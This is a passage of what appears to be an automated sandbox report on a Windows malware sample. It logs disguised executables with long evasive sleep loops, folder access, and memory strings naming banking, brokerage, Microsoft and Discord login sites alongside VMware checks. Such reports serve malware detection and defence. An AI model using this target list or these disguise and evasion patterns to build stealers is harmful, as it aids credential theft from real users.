                                    Source: C:\Drivers\fontdrvhost.exe TID: 1780Thread sleep time: -99667s >= -30000sJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exe TID: 1780Thread sleep time: -99547s >= -30000sJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exe TID: 1780Thread sleep time: -99438s >= -30000sJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exe TID: 1780Thread sleep time: -99313s >= -30000sJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exe TID: 1780Thread sleep time: -99188s >= -30000sJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exe TID: 1780Thread sleep time: -99063s >= -30000sJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exe TID: 1780Thread sleep time: -98944s >= -30000sJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exe TID: 1780Thread sleep time: -98829s >= -30000sJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exe TID: 1780Thread sleep time: -98704s >= -30000sJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exe TID: 1780Thread sleep time: -98579s >= -30000sJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exe TID: 1780Thread sleep time: -98454s >= -30000sJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exe TID: 1780Thread sleep time: -98329s >= -30000sJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exe TID: 1780Thread sleep time: -98204s >= -30000sJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exe TID: 1780Thread sleep time: -98078s >= -30000sJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exe TID: 1780Thread sleep time: -97951s >= -30000sJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exe TID: 1780Thread sleep time: -597062s >= -30000sJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exe TID: 1780Thread sleep time: -596953s >= -30000sJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exe TID: 1780Thread sleep time: -596840s >= -30000sJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exe TID: 6036Thread sleep time: -30000s >= -30000sJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exe TID: 64Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe TID: 3468Thread sleep time: -30000s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe TID: 5588Thread sleep time: -23980767295822402s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe TID: 5588Thread sleep time: -600000s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe TID: 5588Thread sleep time: -599859s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe TID: 5588Thread sleep time: -599730s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe TID: 5588Thread sleep time: -599297s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe TID: 2196Thread sleep time: -21600000s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe TID: 5588Thread sleep time: -598969s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe TID: 5588Thread sleep time: -598840s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe TID: 5588Thread sleep time: -598718s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe TID: 5588Thread sleep time: -598489s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe TID: 5588Thread sleep time: -597953s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe TID: 5588Thread sleep time: -597813s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe TID: 5588Thread sleep time: -597672s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe TID: 5588Thread sleep time: -597562s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe TID: 5588Thread sleep time: -597448s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe TID: 5588Thread sleep time: -597315s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe TID: 5588Thread sleep time: -597188s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe TID: 5588Thread sleep time: -597078s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe TID: 5588Thread sleep time: -596968s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe TID: 5588Thread sleep time: -596859s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe TID: 5588Thread sleep time: -596748s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe TID: 5588Thread sleep time: -596636s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe TID: 5588Thread sleep time: -596516s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe TID: 5588Thread sleep time: -596391s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe TID: 5588Thread sleep time: -596266s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe TID: 5588Thread sleep time: -596155s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe TID: 5588Thread sleep time: -596047s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe TID: 5588Thread sleep time: -595927s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe TID: 2196Thread sleep time: -300000s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe TID: 5588Thread sleep time: -595797s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe TID: 5588Thread sleep time: -595687s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe TID: 5588Thread sleep time: -595578s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe TID: 5588Thread sleep time: -595469s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe TID: 5588Thread sleep time: -595344s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe TID: 5588Thread sleep time: -595234s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe TID: 5588Thread sleep time: -595122s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe TID: 5588Thread sleep time: -595008s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe TID: 5588Thread sleep time: -594635s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe TID: 5588Thread sleep time: -594505s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe TID: 5588Thread sleep time: -594041s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe TID: 5588Thread sleep time: -593609s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe TID: 5588Thread sleep time: -593437s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe TID: 5588Thread sleep time: -593328s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe TID: 5588Thread sleep time: -593219s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe TID: 5588Thread sleep time: -593109s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe TID: 4952Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Drivers\fontdrvhost.exe TID: 2356Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Drivers\fontdrvhost.exe TID: 3172Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Drivers\fontdrvhost.exe TID: 7212Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\PING.EXELast function: Thread delayed
                                    Source: C:\Drivers\fontdrvhost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Drivers\fontdrvhost.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Drivers\fontdrvhost.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Drivers\fontdrvhost.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeCode function: 0_2_00B8A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_00B8A69B
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeCode function: 0_2_00B9C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_00B9C220
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeCode function: 0_2_00BAB348 FindFirstFileExA,0_2_00BAB348
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeCode function: 0_2_00B9E6A3 VirtualQuery,GetSystemInfo,0_2_00B9E6A3
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 600000Jump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 599874Jump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 599765Jump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 599656Jump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 599546Jump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 599437Jump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 599326Jump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 599218Jump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 100000Jump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 99891Jump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 99782Jump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 99667Jump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 99547Jump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 99438Jump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 99313Jump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 99188Jump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 99063Jump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 98944Jump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 98829Jump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 98704Jump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 98579Jump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 98454Jump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 98329Jump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 98204Jump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 98078Jump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 97951Jump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 597062Jump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 596953Jump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 596840Jump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 30000Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 600000Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 599859Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 599730Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 599297Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 3600000Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 598969Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 598840Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 598718Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 598489Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 597953Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 597813Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 597672Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 597562Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 597448Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 597315Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 597188Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 597078Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 596968Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 596859Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 596748Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 596636Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 596516Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 596391Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 596266Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 596155Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 596047Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 595927Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 300000Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 595797Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 595687Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 595578Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 595469Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 595344Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 595234Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 595122Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 595008Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 594635Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 594505Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 594041Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 593609Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 593437Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 593328Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 593219Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 593109Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Drivers\fontdrvhost.exeFile opened: C:\Users\user\AppDataJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeFile opened: C:\Users\userJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                                    Source: yMxl40p9wV.24.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                                    Source: yMxl40p9wV.24.drBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                                    Source: yMxl40p9wV.24.drBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
                                    Source: yMxl40p9wV.24.drBinary or memory string: discord.comVMware20,11696487552f
                                    Source: yMxl40p9wV.24.drBinary or memory string: bankofamerica.comVMware20,11696487552x
                                    Source: yMxl40p9wV.24.drBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
                                    Source: yMxl40p9wV.24.drBinary or memory string: ms.portal.azure.comVMware20,11696487552
                                    Source: yMxl40p9wV.24.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                                    Source: yMxl40p9wV.24.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                                    Source: yMxl40p9wV.24.drBinary or memory string: global block list test formVMware20,11696487552
                                    Source: yMxl40p9wV.24.drBinary or memory string: tasks.office.comVMware20,11696487552o
                                    Source: yMxl40p9wV.24.drBinary or memory string: AMC password management pageVMware20,11696487552
                                    Source: fontdrvhost.exe, 00000005.00000002.2226630126.000000001BAAD000.00000004.00000020.00020000.00000000.sdmp, AdbXCBUViTnoVBSsOq.exe, 00000018.00000002.4607725913.000000001B1B0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                    Source: yMxl40p9wV.24.drBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
                                    Source: yMxl40p9wV.24.drBinary or memory string: interactivebrokers.comVMware20,11696487552
                                    Source: yMxl40p9wV.24.drBinary or memory string: dev.azure.comVMware20,11696487552j
                                    Source: yMxl40p9wV.24.drBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
                                    Source: yMxl40p9wV.24.drBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                                    Source: wscript.exe, 00000002.00000003.2138816101.0000000003734000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                                    Source: yMxl40p9wV.24.drBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
                                    Source: fontdrvhost.exe, 00000005.00000002.2226153517.000000001B9DF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
                                    Source: yMxl40p9wV.24.drBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                                    Source: yMxl40p9wV.24.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                                    Source: yMxl40p9wV.24.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                                    Source: yMxl40p9wV.24.drBinary or memory string: outlook.office365.comVMware20,11696487552t
                                    Source: yMxl40p9wV.24.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                                    Source: yMxl40p9wV.24.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                                    Source: yMxl40p9wV.24.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                                    Source: yMxl40p9wV.24.drBinary or memory string: outlook.office.comVMware20,11696487552s
                                    Source: yMxl40p9wV.24.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                                    Source: yMxl40p9wV.24.drBinary or memory string: turbotax.intuit.comVMware20,11696487552t
                                    Source: yMxl40p9wV.24.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
                                    Source: yMxl40p9wV.24.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
                                    Source: yMxl40p9wV.24.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
